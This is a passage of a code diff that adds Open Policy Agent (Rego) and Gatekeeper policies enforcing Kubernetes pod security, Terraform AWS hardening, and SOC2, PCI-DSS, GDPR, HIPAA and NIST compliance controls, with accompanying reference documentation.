# GDPR Article 30: Records of Processing Activities
# Require data processing record
deny[msg] {
input.kind == "Deployment"
processes_personal_data(input)
not input.metadata.annotations["dpa.record-id"]
msg := {
"control": "GDPR Article 30",
"severity": "medium",
"violation": sprintf("Personal data deployment requires processing record: %v", [input.metadata.name]),
"remediation": "Add annotation: dpa.record-id=<record-id>",
}
}
# GDPR Article 35: Data Protection Impact Assessment (DPIA)
# Require DPIA for high-risk processing
deny[msg] {
input.kind == "Deployment"
input.metadata.labels["data-type"] == "sensitive"
not input.metadata.annotations["dpia.reference"]
msg := {
"control": "GDPR Article 35",
"severity": "high",
"violation": sprintf("Sensitive data deployment requires DPIA: %v", [input.metadata.name]),
"remediation": "Conduct DPIA and add annotation: dpia.reference=<dpia-id>",
}
}
# GDPR Article 17: Right to Erasure (Right to be Forgotten)
# Require data retention policy
deny[msg] {
input.kind == "PersistentVolumeClaim"
input.metadata.labels["data-type"] == "personal"
not input.metadata.annotations["data-retention.days"]
msg := {
"control": "GDPR Article 17",
"severity": "medium",
"violation": sprintf("Personal data volume requires retention policy: %v", [input.metadata.name]),
"remediation": "Add annotation: data-retention.days=<number>",
}
}

View File

@@ -0,0 +1,87 @@
apiVersion: templates.gatekeeper.sh/v1beta1
kind: ConstraintTemplate
metadata:
name: k8spodsecurity
annotations:
description: "Enforces pod security standards including privileged containers, host namespaces, and capabilities"
spec:
crd:
spec:
names:
kind: K8sPodSecurity
validation:
openAPIV3Schema:
type: object
properties:
allowPrivileged:
type: boolean
description: "Allow privileged containers"
allowHostNamespace:
type: boolean
description: "Allow host namespace usage"
allowedCapabilities:
type: array
description: "List of allowed capabilities"
items:
type: string
targets:
- target: admission.k8s.gatekeeper.sh
rego: |
package k8spodsecurity
import future.keywords.contains
import future.keywords.if
violation[{"msg": msg}] {
not input.parameters.allowPrivileged
container := input.review.object.spec.containers[_]
container.securityContext.privileged == true
msg := sprintf("Privileged container not allowed: %v", [container.name])
}
violation[{"msg": msg}] {
container := input.review.object.spec.containers[_]
not container.securityContext.runAsNonRoot
msg := sprintf("Container must run as non-root: %v", [container.name])
}
violation[{"msg": msg}] {
container := input.review.object.spec.containers[_]
not container.securityContext.readOnlyRootFilesystem
msg := sprintf("Container must use read-only root filesystem: %v", [container.name])
}
violation[{"msg": msg}] {
not input.parameters.allowHostNamespace
input.review.object.spec.hostPID == true
msg := "Host PID namespace not allowed"
}
violation[{"msg": msg}] {
not input.parameters.allowHostNamespace
input.review.object.spec.hostIPC == true
msg := "Host IPC namespace not allowed"
}
violation[{"msg": msg}] {
not input.parameters.allowHostNamespace
input.review.object.spec.hostNetwork == true
msg := "Host network namespace not allowed"
}
violation[{"msg": msg}] {
volume := input.review.object.spec.volumes[_]
volume.hostPath
msg := sprintf("hostPath volume not allowed: %v", [volume.name])
}
violation[{"msg": msg}] {
container := input.review.object.spec.containers[_]
capability := container.securityContext.capabilities.add[_]
not is_allowed_capability(capability)
msg := sprintf("Capability %v not allowed for container: %v", [capability, container.name])
}
is_allowed_capability(capability) {
input.parameters.allowedCapabilities[_] == capability
}

View File

@@ -0,0 +1,20 @@
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sPodSecurity
metadata:
name: pod-security-policy
spec:
match:
kinds:
- apiGroups: [""]
kinds: ["Pod"]
namespaces:
- "production"
- "staging"
excludedNamespaces:
- "kube-system"
- "gatekeeper-system"
parameters:
allowPrivileged: false
allowHostNamespace: false
allowedCapabilities:
- "NET_BIND_SERVICE" # Allow binding to privileged ports

View File

@@ -0,0 +1,90 @@
package kubernetes.admission
import future.keywords.contains
import future.keywords.if
# Deny privileged containers
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
container.securityContext.privileged == true
msg := sprintf("Privileged container is not allowed: %v", [container.name])
}
# Enforce non-root user
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
not container.securityContext.runAsNonRoot
msg := sprintf("Container must run as non-root user: %v", [container.name])
}
# Require read-only root filesystem
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
not container.securityContext.readOnlyRootFilesystem
msg := sprintf("Container must use read-only root filesystem: %v", [container.name])
}
# Deny host namespaces
deny[msg] {
input.request.kind.kind == "Pod"
input.request.object.spec.hostPID == true
msg := "Sharing the host PID namespace is not allowed"
}
deny[msg] {
input.request.kind.kind == "Pod"
input.request.object.spec.hostIPC == true
msg := "Sharing the host IPC namespace is not allowed"
}
deny[msg] {
input.request.kind.kind == "Pod"
input.request.object.spec.hostNetwork == true
msg := "Sharing the host network namespace is not allowed"
}
# Deny hostPath volumes
deny[msg] {
input.request.kind.kind == "Pod"
volume := input.request.object.spec.volumes[_]
volume.hostPath
msg := sprintf("hostPath volumes are not allowed: %v", [volume.name])
}
# Require dropping ALL capabilities
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
not drops_all_capabilities(container)
msg := sprintf("Container must drop ALL capabilities: %v", [container.name])
}
drops_all_capabilities(container) {
container.securityContext.capabilities.drop[_] == "ALL"
}
# Deny dangerous capabilities
dangerous_capabilities := [
"CAP_SYS_ADMIN",
"CAP_NET_ADMIN",
"CAP_SYS_PTRACE",
"CAP_SYS_MODULE",
]
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
capability := container.securityContext.capabilities.add[_]
dangerous_capabilities[_] == capability
msg := sprintf("Capability %v is not allowed for container: %v", [capability, container.name])
}
# Require seccomp profile
deny[msg] {
input.request.kind.kind == "Pod"
not input.request.object.spec.securityContext.seccompProfile
msg := "Pod must define a seccomp profile"
}

View File

@@ -0,0 +1,131 @@
package compliance.pci
import future.keywords.if
# PCI-DSS Requirement 1.2: Firewall Configuration
# Require network policies for cardholder data
deny[msg] {
input.kind == "Namespace"
input.metadata.labels["pci.scope"] == "in-scope"
not input.metadata.annotations["network-policy.enabled"] == "true"
msg := {
"control": "PCI-DSS 1.2",
"severity": "high",
"violation": sprintf("PCI in-scope namespace requires network policy: %v", [input.metadata.name]),
"remediation": "Create NetworkPolicy to restrict traffic and add annotation",
}
}
# PCI-DSS Requirement 2.2: System Hardening
# Container hardening - read-only filesystem
deny[msg] {
input.kind == "Pod"
input.metadata.labels["pci.scope"] == "in-scope"
container := input.spec.containers[_]
not container.securityContext.readOnlyRootFilesystem
msg := {
"control": "PCI-DSS 2.2",
"severity": "high",
"violation": sprintf("PCI container requires read-only filesystem: %v", [container.name]),
"remediation": "Set securityContext.readOnlyRootFilesystem: true",
}
}
# Container hardening - no privilege escalation
deny[msg] {
input.kind == "Pod"
input.metadata.labels["pci.scope"] == "in-scope"
container := input.spec.containers[_]
not container.securityContext.allowPrivilegeEscalation == false
msg := {
"control": "PCI-DSS 2.2",
"severity": "high",
"violation": sprintf("PCI container allows privilege escalation: %v", [container.name]),
"remediation": "Set securityContext.allowPrivilegeEscalation: false",
}
}
# PCI-DSS Requirement 3.4: Encryption of Cardholder Data
# Require encryption for PCI data at rest
deny[msg] {
input.kind == "PersistentVolumeClaim"
input.metadata.labels["pci.scope"] == "in-scope"
not input.metadata.annotations["volume.encryption.enabled"] == "true"
msg := {
"control": "PCI-DSS 3.4",
"severity": "critical",
"violation": sprintf("PCI volume requires encryption: %v", [input.metadata.name]),
"remediation": "Enable volume encryption",
}
}
# Require TLS for PCI data in transit
deny[msg] {
input.kind == "Service"
input.metadata.labels["pci.scope"] == "in-scope"
not input.metadata.annotations["tls.enabled"] == "true"
msg := {
"control": "PCI-DSS 4.1",
"severity": "critical",
"violation": sprintf("PCI service requires TLS encryption: %v", [input.metadata.name]),
"remediation": "Enable TLS for data in transit",
}
}
# PCI-DSS Requirement 8.2.1: Strong Authentication
# Require MFA for payment endpoints
deny[msg] {
input.kind == "Ingress"
input.metadata.labels["payment.enabled"] == "true"
not input.metadata.annotations["mfa.required"] == "true"
msg := {
"control": "PCI-DSS 8.2.1",
"severity": "high",
"violation": sprintf("Payment ingress requires MFA: %v", [input.metadata.name]),
"remediation": "Enable MFA via annotation: mfa.required=true",
}
}
# PCI-DSS Requirement 10.2: Audit Logging
# Require audit logging for PCI components
deny[msg] {
input.kind == "Deployment"
input.metadata.labels["pci.scope"] == "in-scope"
not has_audit_logging(input)
msg := {
"control": "PCI-DSS 10.2",
"severity": "high",
"violation": sprintf("PCI deployment requires audit logging: %v", [input.metadata.name]),
"remediation": "Deploy audit logging sidecar or enable centralized logging",
}
}
has_audit_logging(resource) {
resource.spec.template.metadata.annotations["audit.enabled"] == "true"
}
has_audit_logging(resource) {
container := resource.spec.template.spec.containers[_]
contains(container.name, "audit")
}
# PCI-DSS Requirement 11.3: Penetration Testing
# Require security testing evidence for PCI deployments
deny[msg] {
input.kind == "Deployment"
input.metadata.labels["pci.scope"] == "in-scope"
input.metadata.namespace == "production"
not input.metadata.annotations["security-testing.date"]
msg := {
"control": "PCI-DSS 11.3",
"severity": "medium",
"violation": sprintf("PCI deployment requires security testing evidence: %v", [input.metadata.name]),
"remediation": "Add annotation: security-testing.date=YYYY-MM-DD",
}
}

View File

@@ -0,0 +1,107 @@
package compliance.soc2
import future.keywords.if
# SOC2 CC6.1: Logical and Physical Access Controls
# Deny overly permissive RBAC
deny[msg] {
input.kind == "RoleBinding"
input.roleRef.name == "cluster-admin"
not startswith(input.subjects[_].name, "system:")
msg := {
"control": "SOC2 CC6.1",
"severity": "high",
"violation": sprintf("Overly permissive cluster-admin binding: %v", [input.metadata.name]),
"remediation": "Use least-privilege roles instead of cluster-admin",
}
}
# Require authentication for external services
deny[msg] {
input.kind == "Service"
input.spec.type == "LoadBalancer"
not input.metadata.annotations["auth.required"] == "true"
msg := {
"control": "SOC2 CC6.1",
"severity": "medium",
"violation": sprintf("External service without authentication: %v", [input.metadata.name]),
"remediation": "Add annotation: auth.required=true",
}
}
# SOC2 CC6.6: Encryption in Transit
# Require TLS for Ingress
deny[msg] {
input.kind == "Ingress"
not input.spec.tls
msg := {
"control": "SOC2 CC6.6",
"severity": "high",
"violation": sprintf("Ingress without TLS: %v", [input.metadata.name]),
"remediation": "Configure spec.tls with valid certificates",
}
}
# Require TLS for LoadBalancer
deny[msg] {
input.kind == "Service"
input.spec.type == "LoadBalancer"
not input.metadata.annotations["service.beta.kubernetes.io/aws-load-balancer-ssl-cert"]
msg := {
"control": "SOC2 CC6.6",
"severity": "high",
"violation": sprintf("LoadBalancer without SSL/TLS: %v", [input.metadata.name]),
"remediation": "Add SSL certificate annotation",
}
}
# SOC2 CC6.7: Encryption at Rest
# Require encrypted volumes for confidential data
deny[msg] {
input.kind == "PersistentVolumeClaim"
input.metadata.labels["data-classification"] == "confidential"
not input.metadata.annotations["volume.beta.kubernetes.io/storage-encrypted"] == "true"
msg := {
"control": "SOC2 CC6.7",
"severity": "high",
"violation": sprintf("Unencrypted volume for confidential data: %v", [input.metadata.name]),
"remediation": "Enable volume encryption annotation",
}
}
# SOC2 CC7.2: System Monitoring
# Require audit logging for critical systems
deny[msg] {
input.kind == "Deployment"
input.metadata.labels["critical-system"] == "true"
not has_audit_logging(input)
msg := {
"control": "SOC2 CC7.2",
"severity": "medium",
"violation": sprintf("Critical system without audit logging: %v", [input.metadata.name]),
"remediation": "Enable audit logging via sidecar or annotations",
}
}
has_audit_logging(resource) {
resource.spec.template.metadata.annotations["audit.enabled"] == "true"
}
# SOC2 CC8.1: Change Management
# Require approval for production changes
deny[msg] {
input.kind == "Deployment"
input.metadata.namespace == "production"
not input.metadata.annotations["change-request.id"]
msg := {
"control": "SOC2 CC8.1",
"severity": "medium",
"violation": sprintf("Production deployment without change request: %v", [input.metadata.name]),
"remediation": "Add annotation: change-request.id=CR-XXXX",
}
}

View File

@@ -0,0 +1,223 @@
package terraform.security
import future.keywords.if
# AWS S3 Bucket Security
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_s3_bucket"
not has_encryption(resource)
msg := {
"resource": resource.name,
"type": "aws_s3_bucket",
"severity": "high",
"violation": "S3 bucket must have encryption enabled",
"remediation": "Add server_side_encryption_configuration block",
}
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_s3_bucket"
not has_versioning(resource)
msg := {
"resource": resource.name,
"type": "aws_s3_bucket",
"severity": "medium",
"violation": "S3 bucket should have versioning enabled",
"remediation": "Add versioning configuration with enabled = true",
}
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_s3_bucket_public_access_block"
resource.change.after.block_public_acls == false
msg := {
"resource": resource.name,
"type": "aws_s3_bucket_public_access_block",
"severity": "high",
"violation": "S3 bucket must block public ACLs",
"remediation": "Set block_public_acls = true",
}
}
has_encryption(resource) {
resource.change.after.server_side_encryption_configuration
}
has_versioning(resource) {
resource.change.after.versioning[_].enabled == true
}
# AWS EC2 Security
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_instance"
not resource.change.after.metadata_options.http_tokens == "required"
msg := {
"resource": resource.name,
"type": "aws_instance",
"severity": "high",
"violation": "EC2 instance must use IMDSv2",
"remediation": "Set metadata_options.http_tokens = required",
}
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_instance"
resource.change.after.associate_public_ip_address == true
is_production
msg := {
"resource": resource.name,
"type": "aws_instance",
"severity": "high",
"violation": "Production EC2 instances cannot have public IPs",
"remediation": "Set associate_public_ip_address = false",
}
}
is_production {
input.variables.environment == "production"
}
# AWS RDS Security
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_db_instance"
not resource.change.after.storage_encrypted
msg := {
"resource": resource.name,
"type": "aws_db_instance",
"severity": "high",
"violation": "RDS instance must have encryption enabled",
"remediation": "Set storage_encrypted = true",
}
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_db_instance"
resource.change.after.publicly_accessible == true
msg := {
"resource": resource.name,
"type": "aws_db_instance",
"severity": "critical",
"violation": "RDS instance cannot be publicly accessible",
"remediation": "Set publicly_accessible = false",
}
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_db_instance"
backup_retention := resource.change.after.backup_retention_period
backup_retention < 7
msg := {
"resource": resource.name,
"type": "aws_db_instance",
"severity": "medium",
"violation": "RDS instance must have at least 7 days backup retention",
"remediation": "Set backup_retention_period >= 7",
}
}
# AWS IAM Security
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_iam_policy"
statement := resource.change.after.policy.Statement[_]
statement.Action[_] == "*"
msg := {
"resource": resource.name,
"type": "aws_iam_policy",
"severity": "high",
"violation": "IAM policy cannot use wildcard actions",
"remediation": "Specify explicit actions instead of *",
}
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_iam_policy"
statement := resource.change.after.policy.Statement[_]
statement.Resource[_] == "*"
statement.Effect == "Allow"
msg := {
"resource": resource.name,
"type": "aws_iam_policy",
"severity": "high",
"violation": "IAM policy cannot use wildcard resources with Allow",
"remediation": "Specify explicit resource ARNs",
}
}
# AWS Security Group Rules
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_security_group_rule"
resource.change.after.type == "ingress"
resource.change.after.from_port == 22
is_open_to_internet(resource.change.after.cidr_blocks)
msg := {
"resource": resource.name,
"type": "aws_security_group_rule",
"severity": "critical",
"violation": "Security group allows SSH from internet",
"remediation": "Restrict SSH access to specific IP ranges",
}
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_security_group_rule"
resource.change.after.type == "ingress"
resource.change.after.from_port == 3389
is_open_to_internet(resource.change.after.cidr_blocks)
msg := {
"resource": resource.name,
"type": "aws_security_group_rule",
"severity": "critical",
"violation": "Security group allows RDP from internet",
"remediation": "Restrict RDP access to specific IP ranges",
}
}
is_open_to_internet(cidr_blocks) {
cidr_blocks[_] == "0.0.0.0/0"
}
# AWS KMS Security
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_kms_key"
not resource.change.after.enable_key_rotation
msg := {
"resource": resource.name,
"type": "aws_kms_key",
"severity": "medium",
"violation": "KMS key must have automatic rotation enabled",
"remediation": "Set enable_key_rotation = true",
}
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_kms_key"
deletion_window := resource.change.after.deletion_window_in_days
deletion_window < 30
msg := {
"resource": resource.name,
"type": "aws_kms_key",
"severity": "medium",
"violation": "KMS key deletion window must be at least 30 days",
"remediation": "Set deletion_window_in_days >= 30",
}
}

View File

@@ -0,0 +1,40 @@
# Reference Document Template
This file contains detailed reference material that Claude should load only when needed.
## Table of Contents
- [Section 1](#section-1)
- [Section 2](#section-2)
- [Security Standards](#security-standards)
## Section 1
Detailed information, schemas, or examples that are too large for SKILL.md.
## Section 2
Additional reference material.
## Security Standards
### OWASP Top 10
Reference relevant OWASP categories:
- A01: Broken Access Control
- A02: Cryptographic Failures
- etc.
### CWE Mappings
Map to relevant Common Weakness Enumeration categories:
- CWE-79: Cross-site Scripting
- CWE-89: SQL Injection
- etc.
### MITRE ATT&CK
Reference relevant tactics and techniques if applicable:
- TA0001: Initial Access
- T1190: Exploit Public-Facing Application
- etc.

View File

@@ -0,0 +1,507 @@
# Compliance Framework Policy Templates
Policy templates mapped to specific compliance framework controls for SOC2, PCI-DSS, GDPR, HIPAA, and NIST.
## Table of Contents
- [SOC2 Trust Services Criteria](#soc2-trust-services-criteria)
- [PCI-DSS Requirements](#pci-dss-requirements)
- [GDPR Data Protection](#gdpr-data-protection)
- [HIPAA Security Rules](#hipaa-security-rules)
- [NIST Cybersecurity Framework](#nist-cybersecurity-framework)
## SOC2 Trust Services Criteria
### CC6.1: Logical and Physical Access Controls
**Control**: The entity implements logical access security software, infrastructure, and architectures over protected information assets to protect them from security events.
```rego
package compliance.soc2.cc6_1
# Deny overly permissive RBAC
deny[msg] {
input.kind == "RoleBinding"
input.roleRef.name == "cluster-admin"
not startswith(input.subjects[_].name, "system:")
msg := {
"control": "SOC2 CC6.1",
"violation": sprintf("Overly permissive cluster-admin binding: %v", [input.metadata.name]),
"remediation": "Use least-privilege roles instead of cluster-admin"
}
}
# Require authentication for external services
deny[msg] {
input.kind == "Service"
input.spec.type == "LoadBalancer"
not input.metadata.annotations["auth.required"] == "true"
msg := {
"control": "SOC2 CC6.1",
"violation": sprintf("External service without authentication: %v", [input.metadata.name]),
"remediation": "Add auth.required=true annotation"
}
}
# Require MFA for admin access
deny[msg] {
input.kind == "RoleBinding"
contains(input.roleRef.name, "admin")
not input.metadata.annotations["mfa.required"] == "true"
msg := {
"control": "SOC2 CC6.1",
"violation": sprintf("Admin role without MFA requirement: %v", [input.metadata.name]),
"remediation": "Add mfa.required=true annotation"
}
}
```
### CC6.6: Encryption in Transit
**Control**: The entity protects information transmitted to external parties during transmission.
```rego
package compliance.soc2.cc6_6
# Require TLS for external services
deny[msg] {
input.kind == "Ingress"
not input.spec.tls
msg := {
"control": "SOC2 CC6.6",
"violation": sprintf("Ingress without TLS: %v", [input.metadata.name]),
"remediation": "Configure spec.tls with valid certificates"
}
}
# Require TLS for LoadBalancer services
deny[msg] {
input.kind == "Service"
input.spec.type == "LoadBalancer"
not input.metadata.annotations["service.beta.kubernetes.io/aws-load-balancer-ssl-cert"]
msg := {
"control": "SOC2 CC6.6",
"violation": sprintf("LoadBalancer without SSL/TLS: %v", [input.metadata.name]),
"remediation": "Add SSL certificate annotation"
}
}
```
### CC6.7: Encryption at Rest
**Control**: The entity protects information at rest.
```rego
package compliance.soc2.cc6_7
# Require encrypted volumes
deny[msg] {
input.kind == "PersistentVolumeClaim"
input.metadata.labels["data-classification"] == "confidential"
not input.metadata.annotations["volume.beta.kubernetes.io/storage-encrypted"] == "true"
msg := {
"control": "SOC2 CC6.7",
"violation": sprintf("Unencrypted volume for confidential data: %v", [input.metadata.name]),
"remediation": "Enable volume encryption annotation"
}
}
```
### CC7.2: System Monitoring
**Control**: The entity monitors system components and the operation of those components for anomalies.
```rego
package compliance.soc2.cc7_2
# Require audit logging
deny[msg] {
input.kind == "Deployment"
input.metadata.labels["critical-system"] == "true"
not has_audit_logging(input)
msg := {
"control": "SOC2 CC7.2",
"violation": sprintf("Critical system without audit logging: %v", [input.metadata.name]),
"remediation": "Enable audit logging via sidecar or annotations"
}
}
has_audit_logging(resource) {
resource.spec.template.metadata.annotations["audit.enabled"] == "true"
}
```
## PCI-DSS Requirements
### Requirement 1.2: Firewall Configuration
**Control**: Build firewall and router configurations that restrict connections between untrusted networks.
```rego
package compliance.pci.req1_2
# Require network policies for cardholder data
deny[msg] {
input.kind == "Namespace"
input.metadata.labels["pci.scope"] == "in-scope"
not has_network_policy(input.metadata.name)
msg := {
"control": "PCI-DSS 1.2",
"violation": sprintf("PCI in-scope namespace without network policy: %v", [input.metadata.name]),
"remediation": "Create NetworkPolicy to restrict traffic"
}
}
has_network_policy(namespace) {
# Check if NetworkPolicy exists in data (requires external data)
data.network_policies[namespace]
}
```
### Requirement 2.2: System Hardening
**Control**: Develop configuration standards for all system components.
```rego
package compliance.pci.req2_2
# Container hardening requirements
deny[msg] {
input.kind == "Pod"
input.metadata.labels["pci.scope"] == "in-scope"
container := input.spec.containers[_]
not container.securityContext.readOnlyRootFilesystem
msg := {
"control": "PCI-DSS 2.2",
"violation": sprintf("PCI container without read-only filesystem: %v", [container.name]),
"remediation": "Set securityContext.readOnlyRootFilesystem: true"
}
}
deny[msg] {
input.kind == "Pod"
input.metadata.labels["pci.scope"] == "in-scope"
container := input.spec.containers[_]
not container.securityContext.allowPrivilegeEscalation == false
msg := {
"control": "PCI-DSS 2.2",
"violation": sprintf("PCI container allows privilege escalation: %v", [container.name]),
"remediation": "Set securityContext.allowPrivilegeEscalation: false"
}
}
```
### Requirement 8.2.1: Strong Authentication
**Control**: Render all authentication credentials unreadable during transmission and storage.
```rego
package compliance.pci.req8_2_1
# Require MFA for payment endpoints
deny[msg] {
input.kind == "Ingress"
input.metadata.labels["payment.enabled"] == "true"
not input.metadata.annotations["mfa.required"] == "true"
msg := {
"control": "PCI-DSS 8.2.1",
"violation": sprintf("Payment ingress without MFA: %v", [input.metadata.name]),
"remediation": "Enable MFA via annotation: mfa.required=true"
}
}
# Password strength requirements
deny[msg] {
input.kind == "ConfigMap"
input.metadata.name == "auth-config"
to_number(input.data["password.minLength"]) < 12
msg := {
"control": "PCI-DSS 8.2.1",
"violation": "Password minimum length below requirement",
"remediation": "Set password.minLength to at least 12"
}
}
```
### Requirement 10.2: Audit Logging
**Control**: Implement automated audit trails for all system components.
```rego
package compliance.pci.req10_2
# Require audit logging for PCI components
deny[msg] {
input.kind == "Deployment"
input.metadata.labels["pci.scope"] == "in-scope"
not has_audit_sidecar(input)
msg := {
"control": "PCI-DSS 10.2",
"violation": sprintf("PCI deployment without audit logging: %v", [input.metadata.name]),
"remediation": "Deploy audit logging sidecar"
}
}
has_audit_sidecar(resource) {
container := resource.spec.template.spec.containers[_]
contains(container.name, "audit")
}
```
## GDPR Data Protection
### Article 25: Data Protection by Design
**Control**: The controller shall implement appropriate technical and organizational measures.
```rego
package compliance.gdpr.art25
# Require data classification labels
deny[msg] {
input.kind == "Deployment"
processes_personal_data(input)
not input.metadata.labels["data-classification"]
msg := {
"control": "GDPR Article 25",
"violation": sprintf("Deployment processing personal data without classification: %v", [input.metadata.name]),
"remediation": "Add data-classification label"
}
}
# Data minimization - limit replicas for personal data
deny[msg] {
input.kind == "Deployment"
input.metadata.labels["data-type"] == "personal"
input.spec.replicas > 3
not input.metadata.annotations["gdpr.justification"]
msg := {
"control": "GDPR Article 25",
"violation": sprintf("Excessive replicas for personal data: %v", [input.metadata.name]),
"remediation": "Reduce replicas or add justification annotation"
}
}
processes_personal_data(resource) {
resource.metadata.labels["data-type"] == "personal"
}
processes_personal_data(resource) {
contains(lower(resource.metadata.name), "user")
}
```
### Article 32: Security of Processing
**Control**: Implement appropriate technical and organizational measures to ensure a level of security appropriate to the risk.
```rego
package compliance.gdpr.art32
# Require encryption for personal data
deny[msg] {
input.kind == "PersistentVolumeClaim"
input.metadata.labels["data-type"] == "personal"
not input.metadata.annotations["volume.encryption.enabled"] == "true"
msg := {
"control": "GDPR Article 32",
"violation": sprintf("Personal data volume without encryption: %v", [input.metadata.name]),
"remediation": "Enable volume encryption"
}
}
# Require TLS for personal data services
deny[msg] {
input.kind == "Service"
input.metadata.labels["data-type"] == "personal"
not input.metadata.annotations["tls.enabled"] == "true"
msg := {
"control": "GDPR Article 32",
"violation": sprintf("Personal data service without TLS: %v", [input.metadata.name]),
"remediation": "Enable TLS encryption"
}
}
```
## HIPAA Security Rules
### 164.308: Administrative Safeguards
**Control**: Implement policies and procedures to prevent, detect, contain, and correct security violations.
```rego
package compliance.hipaa.admin
# Require access control policies
deny[msg] {
input.kind == "Namespace"
input.metadata.labels["phi-data"] == "true"
not input.metadata.annotations["access-control.policy"]
msg := {
"control": "HIPAA 164.308",
"violation": sprintf("PHI namespace without access control policy: %v", [input.metadata.name]),
"remediation": "Document access control policy in annotation"
}
}
```
### 164.312: Technical Safeguards
**Control**: Implement technical policies and procedures for electronic information systems.
```rego
package compliance.hipaa.technical
# Encryption in transit for PHI
deny[msg] {
input.kind == "Service"
input.metadata.labels["phi-data"] == "true"
not input.metadata.annotations["tls.enabled"] == "true"
msg := {
"control": "HIPAA 164.312",
"violation": sprintf("PHI service without TLS: %v", [input.metadata.name]),
"remediation": "Enable TLS for data in transit"
}
}
# Audit logging for PHI access
deny[msg] {
input.kind == "Deployment"
input.metadata.labels["phi-data"] == "true"
not has_audit_logging(input)
msg := {
"control": "HIPAA 164.312",
"violation": sprintf("PHI deployment without audit logging: %v", [input.metadata.name]),
"remediation": "Enable audit logging for all PHI access"
}
}
has_audit_logging(resource) {
resource.spec.template.metadata.annotations["audit.enabled"] == "true"
}
# Authentication controls
deny[msg] {
input.kind == "Ingress"
input.metadata.labels["phi-data"] == "true"
not input.metadata.annotations["auth.method"]
msg := {
"control": "HIPAA 164.312",
"violation": sprintf("PHI ingress without authentication: %v", [input.metadata.name]),
"remediation": "Configure authentication method"
}
}
```
## NIST Cybersecurity Framework
### PR.AC-4: Access Control
**Control**: Access permissions and authorizations are managed, incorporating the principles of least privilege and separation of duties.
```rego
package compliance.nist.pr_ac_4
# Least privilege - no wildcard permissions
deny[msg] {
input.kind == "Role"
rule := input.rules[_]
rule.verbs[_] == "*"
msg := {
"control": "NIST PR.AC-4",
"violation": sprintf("Wildcard permissions in role: %v", [input.metadata.name]),
"remediation": "Specify explicit verb permissions"
}
}
deny[msg] {
input.kind == "Role"
rule := input.rules[_]
rule.resources[_] == "*"
msg := {
"control": "NIST PR.AC-4",
"violation": sprintf("Wildcard resources in role: %v", [input.metadata.name]),
"remediation": "Specify explicit resource permissions"
}
}
```
### PR.DS-1: Data-at-Rest Protection
**Control**: Data-at-rest is protected.
```rego
package compliance.nist.pr_ds_1
# Require encryption for sensitive data
deny[msg] {
input.kind == "PersistentVolumeClaim"
input.metadata.labels["data-sensitivity"] == "high"
not input.metadata.annotations["volume.encryption"] == "enabled"
msg := {
"control": "NIST PR.DS-1",
"violation": sprintf("Sensitive data volume without encryption: %v", [input.metadata.name]),
"remediation": "Enable volume encryption for data-at-rest protection"
}
}
```
### PR.DS-2: Data-in-Transit Protection
**Control**: Data-in-transit is protected.
```rego
package compliance.nist.pr_ds_2
# Require TLS for external traffic
deny[msg] {
input.kind == "Ingress"
not input.spec.tls
msg := {
"control": "NIST PR.DS-2",
"violation": sprintf("Ingress without TLS: %v", [input.metadata.name]),
"remediation": "Configure TLS for data-in-transit protection"
}
}
```
## Multi-Framework Compliance
Example policy that maps to multiple frameworks:
```rego
package compliance.multi_framework
# Encryption requirement - maps to multiple frameworks
deny[msg] {
input.kind == "Service"
input.spec.type == "LoadBalancer"
not has_tls_encryption(input)
msg := {
"violation": sprintf("External service without TLS encryption: %v", [input.metadata.name]),
"remediation": "Enable TLS/SSL for external services",
"frameworks": {
"SOC2": "CC6.6 - Encryption in Transit",
"PCI-DSS": "4.1 - Use strong cryptography",
"GDPR": "Article 32 - Security of Processing",
"HIPAA": "164.312 - Technical Safeguards",
"NIST": "PR.DS-2 - Data-in-Transit Protection"
}
}
}
has_tls_encryption(service) {
service.metadata.annotations["service.beta.kubernetes.io/aws-load-balancer-ssl-cert"]
}
```
## References
- [SOC2 Trust Services Criteria](https://www.aicpa.org/interestareas/frc/assuranceadvisoryservices/aicpasoc2report.html)
- [PCI-DSS Requirements](https://www.pcisecuritystandards.org/document_library)
- [GDPR Official Text](https://gdpr.eu/)
- [HIPAA Security Rule](https://www.hhs.gov/hipaa/for-professionals/security/index.html)
- [NIST Cybersecurity Framework](https://www.nist.gov/cyberframework)

View File

@@ -0,0 +1,623 @@
# Infrastructure-as-Code Security Policies
OPA policies for validating infrastructure-as-code configurations in Terraform, CloudFormation, and other IaC tools.
## Table of Contents
- [Terraform Policies](#terraform-policies)
- [AWS CloudFormation](#aws-cloudformation)
- [Azure ARM Templates](#azure-arm-templates)
- [GCP Deployment Manager](#gcp-deployment-manager)
## Terraform Policies
### S3 Bucket Security
```rego
package terraform.aws.s3
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_s3_bucket"
not has_encryption(resource)
msg := sprintf("S3 bucket must have encryption enabled: %v", [resource.name])
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_s3_bucket"
not has_versioning(resource)
msg := sprintf("S3 bucket must have versioning enabled: %v", [resource.name])
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_s3_bucket_public_access_block"
resource.change.after.block_public_acls == false
msg := sprintf("S3 bucket must block public ACLs: %v", [resource.name])
}
has_encryption(resource) {
resource.change.after.server_side_encryption_configuration
}
has_versioning(resource) {
resource.change.after.versioning[_].enabled == true
}
```
### EC2 Instance Security
```rego
package terraform.aws.ec2
# Deny instances without IMDSv2
deny[msg] {
resource := input.resource_changes[_]
